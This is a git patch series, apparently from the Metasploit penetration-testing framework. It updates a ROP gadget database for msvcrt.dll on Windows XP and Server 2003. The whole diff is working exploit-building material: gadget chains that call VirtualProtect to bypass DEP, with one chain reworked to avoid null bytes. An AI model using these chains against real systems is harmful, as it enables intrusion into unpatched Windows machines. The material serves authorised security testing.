From 14d99ffbdba4a60d2e070551ee1d54cff2af23d6 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 1 Oct 2013 15:00:43 -0500
Subject: [PATCH 1/2] Update Win XP msvcrt.dll ROP

This updated ROP chain for msvcrt.dll does not have any null bytes.
---
 data/ropdb/msvcrt.xml | 17 +++++++++++++----
 1 file changed, 13 insertions(+), 4 deletions(-)

diff --git a/data/ropdb/msvcrt.xml b/data/ropdb/msvcrt.xml
index 13b85cedec..0ed43d06c0 100644
--- a/data/ropdb/msvcrt.xml
+++ b/data/ropdb/msvcrt.xml
@@ -7,12 +7,21 @@
 	</compatibility>
 
 	<gadgets base="0x77c10000">
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget value="0xFFFFFBFF">0xFFFFFBFF -> ebx</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001362c">POP EBX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
+		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
+		<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 		<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
 		<gadget offset="0x0002ee15">skip 4 bytes</gadget>
-		<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
-		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
 		<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
 		<gadget offset="0x0004d9bb">Writable location</gadget>
 		<gadget offset="0x0001a88c">POP EDI # RETN</gadget>

From cd1f023f72e874d6dc371f29e5f9e7c044d22908 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 1 Oct 2013 16:18:57 -0500
Subject: [PATCH 2/2] Update msvcrt.dll ROP chain for Windows Server 2003

---
 data/ropdb/msvcrt.xml | 36 +++++++++++++++++++++---------------
 1 file changed, 21 insertions(+), 15 deletions(-)

diff --git a/data/ropdb/msvcrt.xml b/data/ropdb/msvcrt.xml
index 0ed43d06c0..177767e9c0 100644
--- a/data/ropdb/msvcrt.xml
+++ b/data/ropdb/msvcrt.xml
@@ -42,23 +42,29 @@
 	</compatibility>
 
 	<gadgets base="0x77ba0000">
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-		<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget offset="0x00001114">VirtualProtect()</gadget>
 		<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
-		<gadget value="junk">Filler</gadget>
+		<gadget value="junk">JUNK</gadget>
 		<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
-		<gadget offset="0x00026320">POP EBP # RETN</gadget>
-		<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
-		<gadget offset="0x000385b7">POP EBX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
-		<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
-		<gadget offset="0x000330fb">POP ECX # RETN</gadget>
-		<gadget offset="0x0004ff56">Writable location</gadget>
-		<gadget offset="0x00038a92">POP EDI # RETN</gadget>
-		<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00029801">POP EBP # RETN</gadget>
+		<gadget offset="0x00042265">ptr to 'push esp #  ret'</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0990F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
+		<gadget offset="0x000148d3">POP EBX, RET</gadget>
+		<gadget offset="0x000521e0">.data</gadget>
+		<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
+		<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
+		<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
+		<gadget offset="0x00038c04">POP EDI # RETN</gadget>
+		<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0944F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
+		<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="nop">NOP</gadget>
 		<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
 	</gadgets>
 </rop>